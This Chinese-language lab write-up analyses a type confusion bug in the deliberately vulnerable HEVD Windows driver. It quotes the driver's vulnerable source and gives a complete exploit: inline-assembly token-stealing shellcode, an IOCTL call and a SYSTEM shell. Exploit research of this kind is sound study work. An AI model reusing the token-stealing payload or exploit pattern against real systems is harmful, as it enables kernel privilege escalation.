作者selph
前言
窥探Ring0漏洞世界:类型混淆
实验环境:
•虚拟机:Windows 7 x86
•物理机:Windows 10 x64
•软件:IDA,Windbg,VS2022
漏洞分析
老样子,先IDA分析漏洞函数TriggerTypeConfusion,然后再看看源码
首先是申请了8字节非分页池内存
然后接下来,把用户传入的8字节结构保存到了内核申请的8字节空间里,然后调用了一个初始化函数,程序就结束了
现在来看看这个初始化程序,打印后4字节的内容,然后调用后4字节的内容(回调函数):
从反汇编的层面看到的是,这里传入的后4字节会被当成函数调用
接下来看看源码:
///
/// Trigger the Type Confusion Vulnerability
///
///The pointer to USER_TYPE_CONFUSION_OBJECT object /// NTSTATUS NTSTATUS TriggerTypeConfusion( _In_ PUSER_TYPE_CONFUSION_OBJECT UserTypeConfusionObject ) { NTSTATUS Status = STATUS_UNSUCCESSFUL; PKERNEL_TYPE_CONFUSION_OBJECT KernelTypeConfusionObject = NULL; PAGED_CODE(); __try { // // Verify if the buffer resides in user mode // ProbeForRead( UserTypeConfusionObject, sizeof(USER_TYPE_CONFUSION_OBJECT), (ULONG)__alignof(UCHAR) ); // // Allocate Pool chunk // KernelTypeConfusionObject = (PKERNEL_TYPE_CONFUSION_OBJECT)ExAllocatePoolWithTag( NonPagedPool, sizeof(KERNEL_TYPE_CONFUSION_OBJECT), (ULONG)POOL_TAG ); if (!KernelTypeConfusionObject) { // // Unable to allocate Pool chunk // DbgPrint("[-] Unable to allocate Pool chunkn"); Status = STATUS_NO_MEMORY; return Status; } else { DbgPrint("[ ] Pool Tag: %sn", STRINGIFY(POOL_TAG)); DbgPrint("[ ] Pool Type: %sn", STRINGIFY(NonPagedPool)); DbgPrint("[ ] Pool Size: 0x%zXn", sizeof(KERNEL_TYPE_CONFUSION_OBJECT)); DbgPrint("[ ] Pool Chunk: 0x%pn", KernelTypeConfusionObject); } DbgPrint("[ ] UserTypeConfusionObject: 0x%pn", UserTypeConfusionObject); DbgPrint("[ ] KernelTypeConfusionObject: 0x%pn", KernelTypeConfusionObject); DbgPrint("[ ] KernelTypeConfusionObject Size: 0x%zXn", sizeof(KERNEL_TYPE_CONFUSION_OBJECT)); KernelTypeConfusionObject->ObjectID = UserTypeConfusionObject->ObjectID; KernelTypeConfusionObject->ObjectType = UserTypeConfusionObject->ObjectType; DbgPrint("[ ] KernelTypeConfusionObject->ObjectID: 0x%pn", KernelTypeConfusionObject->ObjectID); DbgPrint("[ ] KernelTypeConfusionObject->ObjectType: 0x%pn", KernelTypeConfusionObject->ObjectType); #ifdef SECURE // // Secure Note: This is secure because the developer is properly setting 'Callback' // member of the 'KERNEL_TYPE_CONFUSION_OBJECT' structure before passing the pointer // of 'KernelTypeConfusionObject' to 'TypeConfusionObjectInitializer()' function as // parameter // KernelTypeConfusionObject->Callback = &TypeConfusionObjectCallback; Status = TypeConfusionObjectInitializer(KernelTypeConfusionObject); #else DbgPrint("[ ] Triggering Type Confusionn"); // // Vulnerability Note: This is a vanilla Type Confusion vulnerability due to improper // use of the 'UNION' construct. The developer has not set the 'Callback' member of // the 'KERNEL_TYPE_CONFUSION_OBJECT' structure before passing the pointer of // 'KernelTypeConfusionObject' to 'TypeConfusionObjectInitializer()' function as // parameter // Status = TypeConfusionObjectInitializer(KernelTypeConfusionObject); #endif DbgPrint("[ ] Freeing KernelTypeConfusionObject Objectn"); DbgPrint("[ ] Pool Tag: %sn", STRINGIFY(POOL_TAG)); DbgPrint("[ ] Pool Chunk: 0x%pn", KernelTypeConfusionObject); // // Free the allocated Pool chunk // ExFreePoolWithTag((PVOID)KernelTypeConfusionObject, (ULONG)POOL_TAG); KernelTypeConfusionObject = NULL; } __except (EXCEPTION_EXECUTE_HANDLER) { Status = GetExceptionCode(); DbgPrint("[-] Exception Code: 0x%Xn", Status); } return Status; }
这里安全版本和非安全版本的区别在于是否初始化回调函数,然后再进入初始化函数
这里用的对象结构如下,可以看到,用户传入的是4字节的Type,而在内核结构里,后4字节是个联合体
typedef struct _USER_TYPE_CONFUSION_OBJECT { ULONG_PTR ObjectID; ULONG_PTR ObjectType; } USER_TYPE_CONFUSION_OBJECT, *PUSER_TYPE_CONFUSION_OBJECT; typedef struct _KERNEL_TYPE_CONFUSION_OBJECT { ULONG_PTR ObjectID; union { ULONG_PTR ObjectType; FunctionPointer Callback; }; } KERNEL_TYPE_CONFUSION_OBJECT, *PKERNEL_TYPE_CONFUSION_OBJECT;
最后进入初始化函数,就直接调用回调函数了:
///
/// Type Confusion Object Initializer
///
///The pointer to KERNEL_TYPE_CONFUSION_OBJECT object /// NTSTATUS NTSTATUS TypeConfusionObjectInitializer( _In_ PKERNEL_TYPE_CONFUSION_OBJECT KernelTypeConfusionObject ) { NTSTATUS Status = STATUS_SUCCESS; PAGED_CODE(); DbgPrint("[ ] KernelTypeConfusionObject->Callback: 0x%pn", KernelTypeConfusionObject->Callback); DbgPrint("[ ] Calling Callbackn"); KernelTypeConfusionObject->Callback(); DbgPrint("[ ] Kernel Type Confusion Object Initializedn"); return Status; }
这里初始化函数没啥问题,主要在于进入初始化函数之前,对对象结构的操作,因为使用了联合体,如果没有初始化Callback,那么用户输入的ObjectType会被当成Callback去执行,这就是所谓的类型混淆。
漏洞利用
利用思路就很简单了,传入对象后四字节给定shellcode地址即可:
#include #include // Windows 7 SP1 x86 Offsets #define KTHREAD_OFFSET 0x124 // nt!_KPCR.PcrbData.CurrentThread #define EPROCESS_OFFSET 0x050 // nt!_KTHREAD.ApcState.Process #define PID_OFFSET 0x0B4 // nt!_EPROCESS.UniqueProcessId #define FLINK_OFFSET 0x0B8 // nt!_EPROCESS.ActiveProcessLinks.Flink #define TOKEN_OFFSET 0x0F8 // nt!_EPROCESS.Token #define SYSTEM_PID 0x004 // SYSTEM Process PID typedef struct _UserObject { ULONG_PTR ObjectID; ULONG_PTR ObjectType; }UserObject,*PUserObject; VOID TokenStealingPayloadWin7() { // Importance of Kernel Recovery __asm { pushad ;获取当前进程EPROCESS xor eax, eax mov eax, fs: [eax KTHREAD_OFFSET] mov eax, [eax EPROCESS_OFFSET] mov ecx, eax ;搜索system进程EPROCESS mov edx, SYSTEM_PID SearchSystemPID : mov eax, [eax FLINK_OFFSET] sub eax, FLINK_OFFSET cmp[eax PID_OFFSET], edx jne SearchSystemPID ; token窃取 mov edx, [eax TOKEN_OFFSET] mov[ecx TOKEN_OFFSET], edx ; 环境还原 返回 popad } } int main() { ULONG UserBufferSize = sizeof(UserObject); PVOID EopPayload = &TokenStealingPayloadWin7; HANDLE hDevice = ::CreateFileW(L"\\.\HacksysExtremeVulnerableDriver", GENERIC_ALL, FILE_SHARE_WRITE, nullptr, OPEN_EXISTING, 0, nullptr); PUserObject UserBuffer = (PUserObject)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, UserBufferSize); // 构造对象 UserBuffer->ObjectID = 0x12345678; UserBuffer->ObjectType = (ULONG_PTR)EopPayload; ULONG WriteRet = 0; DeviceIoControl(hDevice, 0x222023, (LPVOID)UserBuffer, UserBufferSize, NULL, 0, &WriteRet, NULL); HeapFree(GetProcessHeap(), 0, (LPVOID)UserBuffer); UserBuffer = NULL; system("pause"); system("cmd.exe"); return 0; }
截图演示
挖坑
CVE-2018-8174
参考资料
•[1] hacksysteam/HackSysExtremeVulnerableDriver: HackSys Extreme Vulnerable Windows Driver (github.com) https://github.com/hacksysteam/HackSysExtremeVulnerableDriver